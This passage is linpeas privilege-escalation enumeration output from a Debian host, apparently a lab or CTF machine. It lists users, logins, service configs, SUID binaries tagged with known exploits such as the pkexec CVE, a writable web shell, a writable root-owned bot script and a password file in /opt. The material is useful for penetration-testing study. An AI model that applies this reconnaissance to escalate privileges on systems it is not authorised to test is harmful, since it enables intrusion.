uid=10(uucp) gid=10(uucp) groups=10(uucp)
660
uid=13(proxy) gid=13(proxy) groups=13(proxy)
661
uid=1(daemon[0m) gid=1(daemon[0m) groups=1(daemon[0m)
662
uid=2(bin) gid=2(bin) groups=2(bin)
663
uid=33(www-data) gid=33(www-data) groups=33(www-data)
664
uid=34(backup) gid=34(backup) groups=34(backup)
665
uid=38(list) gid=38(list) groups=38(list)
666
uid=39(irc) gid=39(irc) groups=39(irc)
667
uid=3(sys) gid=3(sys) groups=3(sys)
668
uid=41(gnats) gid=41(gnats) groups=41(gnats)
669
uid=4(sync) gid=65534(nogroup) groups=65534(nogroup)
670
uid=5(games) gid=60(games) groups=60(games)
671
uid=65534(nobody) gid=65534(nogroup) groups=65534(nogroup)
672
uid=6(man) gid=12(man) groups=12(man)
673
uid=7(lp) gid=7(lp) groups=7(lp)
674
uid=8(mail) gid=8(mail) groups=8(mail)
675
uid=999(systemd-coredump) gid=999(systemd-coredump) groups=999(systemd-coredump)
676
uid=9(news) gid=9(news) groups=9(news)
677

678
╔══════════╣ Currently Logged in Users
679

680
══╣ Basic user information
681
 02:22:30 up 55 min,  2 users,  load average: 0.30, 0.09, 1.28
682
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
683
Eecho    pts/0    192.168.0.108    02:12    3:26   0.09s  0.00s w
684
Eecho    pts/1    192.168.0.108    02:14    1:24   0.00s  0.00s -bash
685

686
══╣ Active sessions
687
 02:22:30 up 55 min,  2 users,  load average: 0.30, 0.09, 1.28
688
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
689
Eecho    pts/0    192.168.0.108    02:12    3:26   0.09s  0.00s w
690
Eecho    pts/1    192.168.0.108    02:14    1:24   0.00s  0.00s -bash
691

692
══╣ Logged in users (utmp)
693
           system boot  2026-01-24 01:26
694
           run-level 5  2026-01-24 01:26
695
LOGIN      tty1         2026-01-24 01:26               367 id=tty1
696
Eecho    + pts/0        2026-01-24 02:12 00:03       12504 (192.168.0.108)
697
Eecho    + pts/1        2026-01-24 02:14 00:01       12547 (192.168.0.108)
698

699
══╣ SSH sessions
700
ESTAB      0      0                192.168.0.106:22               192.168.0.108:36408
701
ESTAB      0      0                192.168.0.106:22               192.168.0.108:39356
702

703
══╣ Screen sessions
704

705
══╣ Tmux sessions
706

707
╔══════════╣ Last Logons and Login History
708

709
══╣ Last logins
710
Eecho    pts/1        192.168.0.108    Sat Jan 24 02:14   still logged in
711
Eecho    pts/0        192.168.0.108    Sat Jan 24 02:12   still logged in
712
reboot   system boot  4.19.0-27-amd64  Sat Jan 24 01:26   still running
713
root     pts/0        192.168.1.12     Thu Jan 22 23:44 - crash (1+01:42)
714
root     pts/0        192.168.1.12     Thu Jan 22 23:42 - 23:43  (00:01)
715
reboot   system boot  4.19.0-27-amd64  Thu Jan 22 23:41   still running
716
root     pts/0        192.168.1.8      Thu Jan 22 13:49 - crash  (09:52)
717
reboot   system boot  4.19.0-27-amd64  Thu Jan 22 13:48   still running
718
root     pts/0        192.168.1.8      Thu Jan 22 13:29 - crash  (00:18)
719
reboot   system boot  4.19.0-27-amd64  Thu Jan 22 13:28   still running
720
root     pts/0        192.168.1.8      Thu Jan 22 13:05 - 13:05  (00:00)
721
root     pts/0        192.168.1.8      Thu Jan 22 10:41 - 13:05  (02:24)
722
reboot   system boot  4.19.0-27-amd64  Thu Jan 22 10:40   still running
723
welcome  pts/0        192.168.3.94     Fri Apr 11 22:27 - 22:28  (00:00)
724
root     pts/0        192.168.3.94     Fri Apr 11 22:27 - 22:27  (00:00)
725
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:26   still running
726
root     pts/0        192.168.3.94     Fri Apr 11 22:23 - 22:25  (00:01)
727
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:23 - 22:25  (00:02)
728
root     pts/0        192.168.3.94     Fri Apr 11 22:15 - 22:22  (00:07)
729
reboot   system boot  4.19.0-27-amd64  Fri Apr 11 22:14 - 22:22  (00:08)
730

731
wtmp begins Tue Mar 18 20:40:32 2025
732

733
══╣ Failed login attempts
734

735
══╣ Recent logins from auth.log (limit 20)
736

737
══╣ Last time logon each user
738
Username         Port     From             Latest
739
root             pts/0    192.168.1.12     Thu Jan 22 23:44:10 -0500 2026
740
Eecho            pts/1    192.168.0.108    Sat Jan 24 02:14:41 -0500 2026
741

742
╔══════════╣ Do not forget to test 'su' as any other user with shell: without password and with their names as password (I don't do it in FAST mode...)
743

744
╔══════════╣ Do not forget to execute 'sudo -l' without password or with valid password (if you know it)!!
745

746

747

748
                             ╔══════════════════════╗
749
═════════════════════════════╣ Software Information ╠═════════════════════════════
750
                             ╚══════════════════════╝
751
╔══════════╣ Useful software
752
/usr/bin/base64
753
/usr/bin/g++
754
/usr/bin/gcc
755
/usr/bin/make
756
/usr/bin/perl
757
/usr/bin/php
758
/usr/bin/ping
759
/usr/bin/python3
760
/usr/bin/python3.7
761
/usr/bin/ruby
762
/usr/bin/sudo
763
/usr/bin/wget
764

765
╔══════════╣ Installed Compilers
766
ii  g++                           4:10.2.1-1                                  amd64        GNU C++ compiler
767
ii  g++-10                        10.2.1-6                                    amd64        GNU C++ compiler
768
ii  gcc                           4:10.2.1-1                                  amd64        GNU C compiler
769
ii  gcc-10                        10.2.1-6                                    amd64        GNU C compiler
770
/usr/bin/gcc
771

772
╔══════════╣ Analyzing Apache-Nginx Files (limit 70)
773
Apache version: Server version: Apache/2.4.62 (Debian)
774
Server built:   2024-08-15T01:18:37
775
httpd Not Found
776

777
Nginx version: nginx Not Found
778

779
/etc/apache2/mods-enabled/php8.3.conf-<FilesMatch ".+\.ph(?:ar|p|tml)$">
780
/etc/apache2/mods-enabled/php8.3.conf:    SetHandler application/x-httpd-php
781
--
782
/etc/apache2/mods-enabled/php8.3.conf-<FilesMatch ".+\.phps$">
783
/etc/apache2/mods-enabled/php8.3.conf:    SetHandler application/x-httpd-php-source
784
--
785
/etc/apache2/mods-available/php8.3.conf-<FilesMatch ".+\.ph(?:ar|p|tml)$">
786
/etc/apache2/mods-available/php8.3.conf:    SetHandler application/x-httpd-php
787
--
788
/etc/apache2/mods-available/php8.3.conf-<FilesMatch ".+\.phps$">
789
/etc/apache2/mods-available/php8.3.conf:    SetHandler application/x-httpd-php-source
790
══╣ PHP exec extensions
791
drwxr-xr-x 2 root root 4096 Jan 22 12:12 /etc/apache2/sites-enabled
792
drwxr-xr-x 2 root root 4096 Jan 22 12:12 /etc/apache2/sites-enabled
793
lrwxrwxrwx 1 root root 31 Jan 22 12:11 /etc/apache2/sites-enabled/tmpfile.conf -> ../sites-available/tmpfile.conf
794
<VirtualHost *:80>
795
    ServerName tmpfile.dsz
796
    DocumentRoot /var/www/html
797
    <Directory /var/www/html>
798
        Options Indexes FollowSymLinks
799
        AllowOverride All
800
        Require all granted
801
    </Directory>
802
    ErrorLog ${APACHE_LOG_DIR}/tmpfile_error.log
803
    CustomLog ${APACHE_LOG_DIR}/tmpfile_access.log combined
804
</VirtualHost>
805
lrwxrwxrwx 1 root root 33 Jan 22 12:11 /etc/apache2/sites-enabled/localhost.conf -> ../sites-available/localhost.conf
806
<VirtualHost *:80>
807
    ServerName localhost
808
    DocumentRoot /var/www/localhost
809
    ErrorLog ${APACHE_LOG_DIR}/localhost_error.log
810
    CustomLog ${APACHE_LOG_DIR}/localhost_access.log combined
811
</VirtualHost>
812

813

814
-rw-r--r-- 1 root root 1332 Aug 14  2024 /etc/apache2/sites-available/000-default.conf
815
<VirtualHost *:80>
816
        ServerAdmin webmaster@localhost
817
        DocumentRoot /var/www/html
818
        ErrorLog ${APACHE_LOG_DIR}/error.log
819
        CustomLog ${APACHE_LOG_DIR}/access.log combined
820
</VirtualHost>
821

822
-rw-r--r-- 1 root root 73769 Jan 22 11:54 /etc/php/8.3/apache2/php.ini
823
allow_url_fopen = On
824
allow_url_include = Off
825
odbc.allow_persistent = On
826
mysqli.allow_persistent = On
827
pgsql.allow_persistent = On
828
-rw-r--r-- 1 root root 73714 Mar 13  2025 /etc/php/8.3/cli/php.ini
829
allow_url_fopen = On
830
allow_url_include = Off
831
odbc.allow_persistent = On
832
mysqli.allow_persistent = On
833
pgsql.allow_persistent = On
834

835

836

837
╔══════════╣ Analyzing MariaDB Files (limit 70)
838
-rw-r--r-- 1 root root 1126 Nov 30  2023 /etc/mysql/mariadb.cnf
839
[client-server]
840
socket = /run/mysqld/mysqld.sock
841
!includedir /etc/mysql/conf.d/
842
!includedir /etc/mysql/mariadb.conf.d/
843

844

845
╔══════════╣ Analyzing PAM Auth Files (limit 70)
846
drwxr-xr-x 2 root root 4096 Jan 22 12:17 /etc/pam.d
847
-rw-r--r-- 1 root root 2133 Dec 21  2023 /etc/pam.d/sshd
848
account    required     pam_nologin.so
849
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so close
850
session    required     pam_loginuid.so
851
session    optional     pam_keyinit.so force revoke
852
session    optional     pam_motd.so  motd=/run/motd.dynamic
853
session    optional     pam_motd.so noupdate
854
session    optional     pam_mail.so standard noenv # [1]
855
session    required     pam_limits.so
856
session    required     pam_env.so # [1]
857
session    required     pam_env.so user_readenv=1 envfile=/etc/default/locale
858
session [success=ok ignore=ignore module_unknown=ignore default=bad]        pam_selinux.so open
859

860

861
╔══════════╣ Analyzing Ldap Files (limit 70)
862
The password hash is from the {SSHA} to 'structural'
863
drwxr-xr-x 2 root root 4096 Mar 31  2025 /etc/ldap
864

865

866
╔══════════╣ Analyzing Keyring Files (limit 70)
867
drwxr-xr-x 2 root root 4096 Mar 18  2025 /usr/share/keyrings
868

869

870

871

872
╔══════════╣ Analyzing FTP Files (limit 70)
873
-rw-r--r-- 1 root root 6137 Jan 22 13:49 /etc/vsftpd.conf
874
anonymous_enable=YES
875
no_anon_password=YES
876
anon_root=/var/ftp/pub
877
local_enable=YES
878
write_enable
879
anon_upload_enable
880
anon_mkdir_write_enable
881
anon_other_write_enable
882
local_enable=YES
883
#write_enable=YES
884
#anon_upload_enable=YES
885
#anon_mkdir_write_enable=YES
886
#chown_uploads=YES
887
#chown_username=whoever
888
-rw-r--r-- 1 root root 41 Jun 18  2015 /usr/lib/tmpfiles.d/vsftpd.conf
889
-rw-r--r-- 1 root root 564 Aug  6  2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE_NOINETD/vsftpd.conf
890
anonymous_enable
891
local_enable
892
write_enable
893
anon_upload_enable
894
anon_mkdir_write_enable
895
anon_other_write_enable
896
-rw-r--r-- 1 root root 506 Aug  6  2019 /usr/share/doc/vsftpd/examples/INTERNET_SITE/vsftpd.conf
897
anonymous_enable
898
local_enable
899
write_enable
900
anon_upload_enable
901
anon_mkdir_write_enable
902
anon_other_write_enable
903
-rw-r--r-- 1 root root 260 Feb  1  2008 /usr/share/doc/vsftpd/examples/VIRTUAL_USERS/vsftpd.conf
904
anonymous_enable
905
local_enable=YES
906
write_enable
907
anon_upload_enable
908
anon_mkdir_write_enable
909
anon_other_write_enable
910
-rw-r--r-- 1 root root 69 Mar 13  2025 /etc/php/8.3/mods-available/ftp.ini
911
-rw-r--r-- 1 root root 69 Mar 13  2025 /usr/share/php8.3-common/common/ftp.ini
912
╔══════════╣ Analyzing Other Interesting Files (limit 70)
913
-rw-r--r-- 1 root root 3526 Apr 18  2019 /etc/skel/.bashrc
914
-rw-r--r-- 1 Eecho Eecho 3526 Apr 18  2019 /home/Eecho/.bashrc
915
-rw-r--r-- 1 root root 807 Apr 18  2019 /etc/skel/.profile
916
-rw-r--r-- 1 Eecho Eecho 807 Apr 18  2019 /home/Eecho/.profile
917
╔══════════╣ Analyzing Windows Files (limit 70)
918
lrwxrwxrwx 1 root root 22 Mar 31  2025 /etc/alternatives/my.cnf -> /etc/mysql/mariadb.cnf
919
lrwxrwxrwx 1 root root 24 Mar 31  2025 /etc/mysql/my.cnf -> /etc/alternatives/my.cnf
920
-rw-r--r-- 1 root root 83 Mar 31  2025 /var/lib/dpkg/alternatives/my.cnf
921
╔══════════╣ Searching mysql credentials and exec
922
Found readable /etc/mysql/my.cnf
923
[client-server]
924
socket = /run/mysqld/mysqld.sock
925
!includedir /etc/mysql/conf.d/
926
!includedir /etc/mysql/mariadb.conf.d/
927

928
MySQL process not found.
929
╔══════════╣ Analyzing PGP-GPG Files (limit 70)
930
/usr/bin/gpg
931
netpgpkeys Not Found
932
netpgp Not Found
933
-rw-r--r-- 1 root root 8700 Jun 22  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-automatic.gpg
934
-rw-r--r-- 1 root root 8709 Jun 22  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-security-automatic.gpg
935
-rw-r--r-- 1 root root 280 Jun 22  2023 /etc/apt/trusted.gpg.d/debian-archive-bookworm-stable.gpg
936
-rw-r--r-- 1 root root 8700 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-automatic.gpg
937
-rw-r--r-- 1 root root 8709 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-security-automatic.gpg
938
-rw-r--r-- 1 root root 2453 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-bullseye-stable.gpg
939
-rw-r--r-- 1 root root 8132 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-automatic.gpg
940
-rw-r--r-- 1 root root 8141 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-security-automatic.gpg
941
-rw-r--r-- 1 root root 2332 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-buster-stable.gpg
942
-rw-r--r-- 1 root root 7443 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-stretch-automatic.gpg
943
-rw-r--r-- 1 root root 7452 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-stretch-security-automatic.gpg
944
-rw-r--r-- 1 root root 2263 Mar 16  2021 /etc/apt/trusted.gpg.d/debian-archive-stretch-stable.gpg
945
-rw-r--r-- 1 root root 0 Apr  1  2025 /etc/apt/trusted.gpg.d/ondrej_ubuntu_php.gpg
946
-rw-r--r-- 1 root root 1769 Apr  1  2025 /etc/apt/trusted.gpg.d/php.gpg
947
-rw-r--r-- 1 root root 2899 Jul  1  2022 /usr/share/gnupg/distsigkey.gpg
948
-rw-r--r-- 1 root root 8700 Jun 22  2023 /usr/share/keyrings/debian-archive-bookworm-automatic.gpg
949
-rw-r--r-- 1 root root 8709 Jun 22  2023 /usr/share/keyrings/debian-archive-bookworm-security-automatic.gpg
950
-rw-r--r-- 1 root root 280 Jun 22  2023 /usr/share/keyrings/debian-archive-bookworm-stable.gpg
951
-rw-r--r-- 1 root root 8700 Jun 22  2023 /usr/share/keyrings/debian-archive-bullseye-automatic.gpg
952
-rw-r--r-- 1 root root 8709 Jun 22  2023 /usr/share/keyrings/debian-archive-bullseye-security-automatic.gpg
953
-rw-r--r-- 1 root root 2453 Jun 22  2023 /usr/share/keyrings/debian-archive-bullseye-stable.gpg
954
-rw-r--r-- 1 root root 8132 Jun 22  2023 /usr/share/keyrings/debian-archive-buster-automatic.gpg
955
-rw-r--r-- 1 root root 8141 Jun 22  2023 /usr/share/keyrings/debian-archive-buster-security-automatic.gpg
956
-rw-r--r-- 1 root root 2332 Jun 22  2023 /usr/share/keyrings/debian-archive-buster-stable.gpg
957
-rw-r--r-- 1 root root 73314 Jun 22  2023 /usr/share/keyrings/debian-archive-keyring.gpg
958
-rw-r--r-- 1 root root 36873 Jun 22  2023 /usr/share/keyrings/debian-archive-removed-keys.gpg
959
-rw-r--r-- 1 root root 7443 Jun 22  2023 /usr/share/keyrings/debian-archive-stretch-automatic.gpg
960
-rw-r--r-- 1 root root 7452 Jun 22  2023 /usr/share/keyrings/debian-archive-stretch-security-automatic.gpg
961
-rw-r--r-- 1 root root 2263 Jun 22  2023 /usr/share/keyrings/debian-archive-stretch-stable.gpg
962
╔══════════╣ Searching uncommon passwd files (splunk)
963
passwd file: /etc/pam.d/passwd
964
passwd file: /etc/passwd
965
passwd file: /usr/share/lintian/overrides/passwd
966

967
╔══════════╣ Searching ssl/ssh files
968
╔══════════╣ Analyzing SSH Files (limit 70)
969
-rw-r--r-- 1 root root 172 Mar 18  2025 /etc/ssh/ssh_host_ecdsa_key.pub
970
-rw-r--r-- 1 root root 92 Mar 18  2025 /etc/ssh/ssh_host_ed25519_key.pub
971
-rw-r--r-- 1 root root 564 Mar 18  2025 /etc/ssh/ssh_host_rsa_key.pub
972
PermitRootLogin yes
973
ChallengeResponseAuthentication no
974
UsePAM yes
975
══╣ Some certificates were found (out limited):
976
/etc/ssl/certs/ACCVRAIZ1.pem
977
/etc/ssl/certs/AC_RAIZ_FNMT-RCM.pem
978
/etc/ssl/certs/Actalis_Authentication_Root_CA.pem
979
/etc/ssl/certs/AffirmTrust_Commercial.pem
980
/etc/ssl/certs/AffirmTrust_Networking.pem
981
/etc/ssl/certs/AffirmTrust_Premium_ECC.pem
982
/etc/ssl/certs/AffirmTrust_Premium.pem
983
/etc/ssl/certs/Amazon_Root_CA_1.pem
984
/etc/ssl/certs/Amazon_Root_CA_2.pem
985
/etc/ssl/certs/Amazon_Root_CA_3.pem
986
/etc/ssl/certs/Amazon_Root_CA_4.pem
987
/etc/ssl/certs/Atos_TrustedRoot_2011.pem
988
/etc/ssl/certs/Autoridad_de_Certificacion_Firmaprofesional_CIF_A62634068.pem
989
/etc/ssl/certs/Baltimore_CyberTrust_Root.pem
990
/etc/ssl/certs/Buypass_Class_2_Root_CA.pem
991
/etc/ssl/certs/Buypass_Class_3_Root_CA.pem
992
/etc/ssl/certs/ca-certificates.crt
993
/etc/ssl/certs/CA_Disig_Root_R2.pem
994
/etc/ssl/certs/Certigna.pem
995
/etc/ssl/certs/Certigna_Root_CA.pem
996
12580PSTORAGE_CERTSBIN
997

998
══╣ Writable ssh and gpg agents
999
/etc/systemd/user/sockets.target.wants/gpg-agent.socket
1000
/etc/systemd/user/sockets.target.wants/gpg-agent-browser.socket
1001
/etc/systemd/user/sockets.target.wants/gpg-agent-extra.socket
1002
/etc/systemd/user/sockets.target.wants/gpg-agent-ssh.socket
1003
══╣ Some home ssh config file was found
1004
/usr/share/openssh/sshd_config
1005
Include /etc/ssh/sshd_config.d/*.conf
1006
ChallengeResponseAuthentication no
1007
UsePAM yes
1008
X11Forwarding yes
1009
PrintMotd no
1010
AcceptEnv LANG LC_*
1011
Subsystem       sftp    /usr/lib/openssh/sftp-server
1012
══╣ /etc/hosts.allow file found, trying to read the rules:
1013
/etc/hosts.allow
1014
Searching inside /etc/ssh/ssh_config for interesting info
1015
Include /etc/ssh/ssh_config.d/*.conf
1016
Host *
1017
    SendEnv LANG LC_*
1018
    HashKnownHosts yes
1019
    GSSAPIAuthentication yes
1020
                      ╔════════════════════════════════════╗
1021
══════════════════════╣ Files with Interesting Permissions ╠══════════════════════
1022
                      ╚════════════════════════════════════╝
1023
╔══════════╣ SUID - Check easy privesc, exploits and write perms
1024
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
1025
strace Not Found
1026
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/chsh
1027
-rwsr-xr-x 1 root root 53K Jul 27  2018 /usr/bin/chfn  --->  SuSE_9.3/10
1028
-rwsr-xr-x 1 root root 44K Jul 27  2018 /usr/bin/newgrp  --->  HP-UX_10.20
1029
-rwsr-xr-x 1 root root 83K Jul 27  2018 /usr/bin/gpasswd
1030
-rwsr-xr-x 1 root root 47K Apr  6  2024 /usr/bin/mount  --->  Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
1031
-rwsr-xr-x 1 root root 63K Apr  6  2024 /usr/bin/su
1032
-rwsr-xr-x 1 root root 35K Apr  6  2024 /usr/bin/umount  --->  BSD/Linux(08-1996)
1033
-rwsr-xr-x 1 root root 23K Jan 13  2022 /usr/bin/pkexec  --->  Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)/Generic_CVE-2021-4034
1034
-rwsr-xr-x 1 root root 179K Jan 14  2023 /usr/bin/sudo  --->  check_if_the_sudo_version_is_vulnerable
1035
-rwsr-xr-x 1 root root 63K Jul 27  2018 /usr/bin/passwd  --->  Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
1036
-rwsr-xr-- 1 root messagebus 51K Jun  6  2023 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
1037
-rwsr-xr-x 1 root root 10K Mar 28  2017 /usr/lib/eject/dmcrypt-get-device
1038
-rwsr-xr-x 1 root root 471K Dec 21  2023 /usr/lib/openssh/ssh-keysign
1039
-rwsr-xr-x 1 root root 19K Jan 13  2022 /usr/libexec/polkit-agent-helper-1
1040
╔══════════╣ SGID
1041
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#sudo-and-suid
1042
-rwxr-sr-x 1 root shadow 39K Feb 14  2019 /usr/sbin/unix_chkpwd
1043
-rwxr-sr-x 1 root ssh 347K Dec 21  2023 /usr/bin/ssh-agent
1044
-rwxr-sr-x 1 root shadow 71K Jul 27  2018 /usr/bin/chage
1045
-rwxr-sr-x 1 root shadow 31K Jul 27  2018 /usr/bin/expiry
1046
-rwxr-sr-x 1 root tty 15K May  4  2018 /usr/bin/bsd-write
1047
-rwxr-sr-x 1 root crontab 43K Oct 11  2019 /usr/bin/crontab
1048
╔══════════╣ Files with ACLs (limited to 50)
1049
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#acls
1050
files with acls in searched folders Not Found
1051
╔══════════╣ Capabilities
1052
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#capabilities
1053
══╣ Current shell capabilities
1054
./linpeas.sh: 7794: ./linpeas.sh: [[: not found
1055
CapInh:  [Invalid capability format]
1056
./linpeas.sh: 7794: ./linpeas.sh: [[: not found
1057
CapPrm:  [Invalid capability format]
1058
./linpeas.sh: 7785: ./linpeas.sh: [[: not found
1059
CapEff:  [Invalid capability format]
1060
./linpeas.sh: 7794: ./linpeas.sh: [[: not found
1061
CapBnd:  [Invalid capability format]
1062
./linpeas.sh: 7794: ./linpeas.sh: [[: not found
1063
CapAmb:  [Invalid capability format]
1064

1065
╚ Parent process capabilities
1066
./linpeas.sh: 7819: ./linpeas.sh: [[: not found
1067
CapInh:  [Invalid capability format]
1068
./linpeas.sh: 7819: ./linpeas.sh: [[: not found
1069
CapPrm:  [Invalid capability format]
1070
./linpeas.sh: 7810: ./linpeas.sh: [[: not found
1071
CapEff:  [Invalid capability format]
1072
./linpeas.sh: 7819: ./linpeas.sh: [[: not found
1073
CapBnd:  [Invalid capability format]
1074
./linpeas.sh: 7819: ./linpeas.sh: [[: not found
1075
CapAmb:  [Invalid capability format]
1076
Files with capabilities (limited to 50):
1077
/usr/bin/ping = cap_net_raw+ep
1078
/usr/lib/x86_64-linux-gnu/gstreamer1.0/gstreamer-1.0/gst-ptp-helper = cap_net_bind_service,cap_net_admin+ep
1079

1080
╔══════════╣ Checking misconfigurations of ld.so
1081
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#ldso
1082
/etc/ld.so.conf
1083
Content of /etc/ld.so.conf:
1084
include /etc/ld.so.conf.d/*.conf
1085
/etc/ld.so.conf.d
1086
  /etc/ld.so.conf.d/fakeroot-x86_64-linux-gnu.conf
1087
  - /usr/lib/x86_64-linux-gnu/libfakeroot
1088
  /etc/ld.so.conf.d/libc.conf
1089
  - /usr/local/lib
1090
  /etc/ld.so.conf.d/x86_64-linux-gnu.conf
1091
  - /usr/local/lib/x86_64-linux-gnu
1092
  - /lib/x86_64-linux-gnu
1093
  - /usr/lib/x86_64-linux-gnu
1094

1095
/etc/ld.so.preload
1096
╔══════════╣ Files (scripts) in /etc/profile.d/
1097
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#profiles-files
1098
total 8
1099
drwxr-xr-x  2 root root 4096 Sep  3  2022 .
1100
drwxr-xr-x 83 root root 4096 Jan 24 02:15 ..
1101

1102
╔══════════╣ Permissions in init, init.d, systemd, and rc.d
1103
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#init-initd-systemd-and-rcd
1104

1105
╔══════════╣ AppArmor binary profiles
1106
-rw-r--r-- 1 root root  729 Nov 13  2020 usr.sbin.inspircd
1107

1108
═╣ Hashes inside passwd file? ........... No
1109
═╣ Writable passwd file? ................ No
1110
═╣ Credentials in fstab/mtab? ........... No
1111
═╣ Can I read shadow files? ............. No
1112
═╣ Can I read shadow plists? ............ No
1113
═╣ Can I write shadow plists? ........... No
1114
═╣ Can I read opasswd file? ............. No
1115
═╣ Can I write in network-scripts? ...... No
1116
═╣ Can I read root folder? .............. No
1117

1118
╔══════════╣ Searching root files in home dirs (limit 30)
1119
/home/
1120
/root/
1121
/var/www
1122
/var/www/html/uploads/syz.png
1123
/var/www/localhost/index.html
1124

1125
╔══════════╣ Searching folders owned by me containing others files on it (limit 100)
1126

1127
╔══════════╣ Readable files belonging to root and readable by me but not world readable
1128

1129
╔══════════╣ Interesting writable files owned by me or writable by everyone (not in Home) (max 200)
1130
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
1131
/dev/mqueue
1132
/dev/shm
1133
/home/Eecho
1134
/run/lock
1135
/run/user/1000
1136
/run/user/1000/dbus-1
1137
/run/user/1000/dbus-1/services
1138
/run/user/1000/gnupg
1139
/run/user/1000/systemd
1140
/run/user/1000/systemd/inaccessible
1141
/run/user/1000/systemd/inaccessible/dir
1142
/run/user/1000/systemd/inaccessible/reg
1143
/run/user/1000/systemd/units
1144
/tmp
1145
/tmp/.font-unix
1146
/tmp/.ICE-unix
1147
/tmp/.Test-unix
1148
/tmp/.X11-unix
1149
/tmp/.XIM-unix
1150
/usr/local/bin/irc_bot.py
1151
/var/lib/php/sessions
1152
/var/tmp
1153
/var/www/html/shell.php
1154

1155
╔══════════╣ Interesting GROUP writable files (not in Home) (max 200)
1156
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#writable-files
1157
                            ╔═════════════════════════╗
1158
════════════════════════════╣ Other Interesting Files ╠════════════════════════════
1159
                            ╚═════════════════════════╝
1160
╔══════════╣ .sh files in path
1161
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#scriptbinaries-in-path
1162
/usr/bin/gettext.sh
1163

1164
╔══════════╣ Executable files potentially added by user (limit 70)
1165
2026-01-22+11:35:24.8002567090 /var/www/html/index.php
1166
2025-04-11+22:22:32.8990844810 /etc/grub.d/10_linux
1167
2025-04-11+22:07:00.9628442610 /etc/grub.d/40_custom
1168
2025-04-05+08:32:38.1253354200 /usr/local/bin/irc_bot.py
1169
2025-04-01+03:55:32.0919414020 /usr/local/bin/calc-prorate
1170

1171
╔══════════╣ Unexpected in /opt (usually empty)
1172
total 12
1173
drwxr-xr-x  2 root root 4096 Jan 22 12:29 .
1174
drwxr-xr-x 18 root root 4096 Mar 18  2025 ..
1175
-rw-r--r--  1 root root   31 Jan 22 12:29 Eecho_pass.txt
1176

1177
╔══════════╣ Unexpected in root
1178
/initrd.img.old
1179
/vmlinuz.old
1180
/vmlinuz
1181
/initrd.img
1182

1183
╔══════════╣ Modified interesting files in the last 5mins (limit 100)
1184
/home/Eecho/.gnupg/trustdb.gpg
1185
/home/Eecho/.gnupg/pubring.kbx
1186
/var/log/syslog
1187
/var/log/auth.log
1188
/var/log/daemon.log
1189
/var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/system.journal
1190
/var/log/journal/52a22a6e47cb4a5995fb43c3554baa0e/user-1000.journal
1191

1192
╔══════════╣ Writable log files (logrotten) (limit 50)
1193
╚ https://book.hacktricks.wiki/en/linux-hardening/privilege-escalation/index.html#logrotate-exploitation
1194
logrotate 3.14.0
1195

1196
    Default mail command:       /usr/bin/mail
1197
    Default compress command:   /bin/gzip
1198
    Default uncompress command: /bin/gunzip
1199
    Default compress extension: .gz
1200
    Default state file path:    /var/lib/logrotate/status
1201
    ACL support:                yes
1202
    SELinux support:            yes
1203
╔══════════╣ Syslog configuration (limit 50)
1204

1205

1206

1207
module(load="imuxsock") # provides support for local system logging
1208
module(load="imklog")   # provides kernel logging support
1209

1210

1211

1212

1213

1214
$ActionFileDefaultTemplate RSYSLOG_TraditionalFileFormat
1215

1216
$FileOwner root
1217
$FileGroup adm
1218
$FileCreateMode 0640
1219
$DirCreateMode 0755
1220
$Umask 0022
1221

1222
$WorkDirectory /var/spool/rsyslog
1223

1224
$IncludeConfig /etc/rsyslog.d/*.conf
1225

1226

1227

1228
auth,authpriv.*                 /var/log/auth.log
1229
*.*;auth,authpriv.none          -/var/log/syslog
1230
daemon.*                        -/var/log/daemon.log
1231
kern.*                          -/var/log/kern.log
1232
lpr.*                           -/var/log/lpr.log
1233
mail.*                          -/var/log/mail.log
1234
user.*                          -/var/log/user.log
1235

1236
mail.info                       -/var/log/mail.info
1237
mail.warn                       -/var/log/mail.warn
1238
mail.err                        /var/log/mail.err
1239

1240
*.=debug;\
1241
        auth,authpriv.none;\
1242
        news.none;mail.none     -/var/log/debug
1243
*.=info;*.=notice;*.=warn;\
1244
        auth,authpriv.none;\
1245
        cron,daemon.none;\
1246
        mail,news.none          -/var/log/messages
1247

1248
*.emerg                         :omusrmsg:*
1249
╔══════════╣ Auditd configuration (limit 50)
1250
auditd configuration Not Found
1251
╔══════════╣ Log files with potentially weak perms (limit 50)
1252
   133959     36 -rw-r-----   1 root     adm         29127 Jan 24 01:26 /var/log/debug
1253
   133873    112 -rw-r-----   1 root     adm        106530 Jan 22 10:40 /var/log/daemon.log.1
1254
